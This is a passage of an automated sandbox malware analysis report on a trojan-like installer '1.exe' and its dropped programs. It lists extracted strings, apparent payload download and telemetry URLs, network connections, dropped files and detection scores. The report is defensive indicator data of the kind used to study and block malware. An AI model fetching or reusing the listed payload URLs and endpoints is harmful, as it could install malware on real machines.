    Source: 1.exe, 00000004.00000003.1588667153.000000000C534000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141529603.0000027535FF1000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-formatting-compact
    Source: MainSoftware.exe, 00000010.00000002.2141547348.0000027536000000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-sinks-file
    Source: MainSoftware.exe, 00000010.00000002.2141547348.0000027536000000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog-sinks-fileC
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com%/install/getfiles/
    Source: MainSoftware.exe, 00000010.00000002.2141451491.0000027535BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com/install/whattoinstall/Ghttps://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000010.00000002.2141451491.0000027535BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jonatechlab.com/logs/telemetry
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.com/logs/telemetry-MyPersistentApp_Hourly
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://jonatechlab.comH123e4567-e89b-12d3-a456-426614174000
    Source: 1.exe, 1.exe, 00000004.00000003.2247463366.00000000081B9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1597724599.000000000819A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000017.00000002.2171835175.000000137B189000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://qb-hos.pages.dev/page-2/?source_id=6
    Source: 1.exe, 1.exe, 00000004.00000003.1316784592.0000000008216000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1316821573.000000000821A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.000000000506F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517337406.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.0000000005071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
    Source: 1.exe, 00000004.00000003.2248179709.00000000053E4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247638745.00000000053E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe=
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exep
    Source: 1.exe, 1.exe, 0000000B.00000003.2227216121.000000000506F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.0000000005071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg
    Source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkgCtrlEvt
    Source: 1.exe, 00000004.00000002.2261284310.000000000819A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1597724599.000000000819A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkge
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0094E120 NtdllDefWindowProc_W,11_2_0094E120
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0086A490 NtdllDefWindowProc_W,11_2_0086A490
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00867490 NtdllDefWindowProc_W,11_2_00867490
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00866610 NtdllDefWindowProc_W,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,11_2_00866610
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00869640 NtdllDefWindowProc_W,11_2_00869640
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008717B0 NtdllDefWindowProc_W,11_2_008717B0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0087F730 NtdllDefWindowProc_W,11_2_0087F730
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008E2730 NtdllDefWindowProc_W,11_2_008E2730
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00871920 NtdllDefWindowProc_W,11_2_00871920
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0088DAD0 NtdllDefWindowProc_W,11_2_0088DAD0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00879E00 NtdllDefWindowProc_W,DeleteCriticalSection,11_2_00879E00
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00869E30 NtdllDefWindowProc_W,11_2_00869E30
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\51577c.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5903.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5971.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI59B1.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5A00.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{67AEF7BA-A109-4700-BE3F-0231069B1923}Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A3B.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7AA9.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B27.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B86.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8914.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI5903.tmpJump to behavior
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_053E53BD4_3_053E53BD
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_053E53BD4_3_053E53BD
    Source: C:\Users\user\Desktop\1.exeCode function: 4_3_053E09144_3_053E0914
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0088035011_2_00880350
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0085149011_2_00851490
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0088900011_2_00889000
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008E71E011_2_008E71E0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0085795011_2_00857950
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008871F011_2_008871F0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0088F1F011_2_0088F1F0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008833B311_2_008833B3
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008903D011_2_008903D0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A184F011_2_00A184F0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0085342011_2_00853420
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A2256011_2_00A22560
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00885A8011_2_00885A80
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A18A7011_2_00A18A70
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A19A5011_2_00A19A50
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00880BB011_2_00880BB0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0089EB2011_2_0089EB20
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0089DCD011_2_0089DCD0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00AA2C5011_2_00AA2C50
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0087BDE011_2_0087BDE0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00990DF011_2_00990DF0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00898D5011_2_00898D50
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00867E9011_2_00867E90
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00871E6011_2_00871E60
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A0FFB011_2_00A0FFB0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00A18F8011_2_00A18F80
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00896F6011_2_00896F60
    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe C0A814EECAE4E5B4B295F14E4FCFB49C7CEDF47616AA5A1B068DE42272F4976A
    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Main\Chop\Install.exe 63FB3ED0ABA87917847AD256C4E89F7B250ADC6E2EAC74023BB52E091AB0EF97
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 008587B0 appears 52 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00859190 appears 125 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 009A7760 appears 32 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00A84B73 appears 42 times
    Source: MainSoftware.exe.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: MainSoftware.exe.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.13.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.13.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
    Source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C55A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C5EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000CA0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Formatting.Compact.dllV vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C6B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000CA07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C976000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.2247463366.00000000081D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Channels.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C5B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Formats.Asn1.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1597724599.00000000081D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C5C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Sinks.Http.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C5DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.2257156984.00000000081D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C66E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.2253775582.00000000081D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Numerics.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C5D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.dll0 vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C57D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C59F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C684000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C6E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C5B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C562000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShortcutFlags.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFileOperations.dllF vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1588667153.000000000C679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs 1.exe
    Source: 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs 1.exe
    Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: classification engineClassification label: mal48.troj.spyw.evad.winEXE@36/86@4/5
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009B8DA0 FormatMessageW,GetLastError,11_2_009B8DA0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00893550 GetDriveTypeW,GetDiskFreeSpaceExW,11_2_00893550
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0089D260 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_0089D260
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_0085A8A0 LoadResource,LockResource,SizeofResource,11_2_0085A8A0
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\AtomixJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\AtomixJump to behavior
    Source: C:\Program Files\Surfclub\Install.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\shiA18.tmpJump to behavior
    Source: 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 1.exeVirustotal: Detection: 27%
    Source: 1.exeReversingLabs: Detection: 21%
    Source: 1.exeString found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
    Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\1.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
